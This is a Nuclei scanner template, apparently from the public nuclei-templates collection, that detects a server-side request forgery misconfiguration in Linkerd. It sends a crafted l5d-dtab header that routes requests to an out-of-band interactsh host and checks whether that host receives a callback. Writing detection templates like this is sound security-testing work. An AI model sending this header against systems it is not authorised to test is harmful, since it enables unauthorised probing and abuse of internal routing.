Files
nuclei-templates/http/misconfiguration/linkerd-ssrf-detect.yaml
2024-12-01 13:57:55 +00:00

26 lines
741 B
YAML

id: linkerd-ssrf-detection
info:
name: Linkerd SSRF detection
author: dudez
severity: high
description: Linkerd is vulnerable to SSRF.
reference:
- https://twitter.com/nirvana_msu/status/1084144955034165248
metadata:
max-request: 1
tags: ssrf,linkerd,oast,misconfig
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a00473045022100e70b7bac3edb5ca3d7fbc3deed13346e8f8cf6b8ef10b750e6e6a0cad0fcd9d1022074f17f3475c752eac8c5e7dc4a29798c5703a4c47edb29920d4f3108ce09fc04:922c64590222798bb761d5b6d8e72950